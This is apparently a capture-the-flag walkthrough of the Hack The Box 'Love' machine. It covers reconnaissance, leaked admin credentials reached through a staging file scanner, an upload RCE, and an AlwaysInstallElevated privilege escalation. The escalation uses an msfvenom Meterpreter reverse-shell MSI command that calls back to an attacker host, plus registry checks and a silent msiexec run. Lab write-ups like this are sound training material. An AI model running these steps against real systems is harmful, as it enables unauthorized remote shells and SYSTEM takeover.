Love HTB Walkthrough

 

 


Hey guys Styx here. Back again with another HTB walkthrough.
This time we go through the Love box which is rated as easy.

## RECON ##

 
As usual, add love.htb to the /etc/hosts file.

Let's kick off a quick RustScan.

We quickly see that there are 19 ports open. Let's look at further results.

Looking at the scan results we see staging.love.htb. Let's add this to our host file.


Ok let's move on to content discovery. 

When enumerating the target, we get a hit on /admin. Let's browse to this location.

In this pic we can see that we found an admin panel. No further results were found that we can use to dig deeper into the application, so let's look back at the nmap results and take a look at staging.love.htb. On staging.love.htb we found the file scanner. Let's see if we can scan some of the local ports using this file scanner.

After trying a few ports that also used HTTP (as shown in the nmap results), we eventually found the password panel by scanning 127.0.0.1:5000. It seems like we found a password dashboard.


admin creds

Vote Admin Creds admin: @LoveIsInTheAir!!!!
This gives us access to the admin panel over at http://love.htb/admin


## Exploitation ##


Now that we have access to this panel it's time to look for a way to get an initial foothold on the server.

As you can see in the next pic, there is an RCE in the upload functionality when registering new candidates and uploading a photo. This function is located at /admin/candidates.php.




There are a few ways to exploit this vulnerability but I chose the lazy way this time.
Check out this script  HERE

Change some of the path parameters and you are good to go.


And we are in!

On Phoebe's Desktop directory you will find the user.txt


## Privilege Escalation ##

Now let's move on to get system on this box.

When enumerating the system, we see that the AlwaysInstallElevated policy is enabled. This can be verified by running:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated


If both of these registry values are enabled (value = 0x1), then users of any privilege level can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

In the next pic you see that this is the case!


So let's move on to creating that .msi file!

To create it:
msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=PORT -f msi -o styx.msi

Then follow these steps:

  1. Transfer the .msi file to the target.
  2. Use msfconsole's handler to receive the reverse shell ("use exploit/multi/handler" and set the payload to "windows/meterpreter/reverse_tcp").
  3. On the target machine run the file with msiexec /quiet /qn /i styx.msi

Voila! We are SYSTEM.


I hope you enjoyed this walkthrough and you learned something new. 
See you in the next one.

Cheers!

Styx
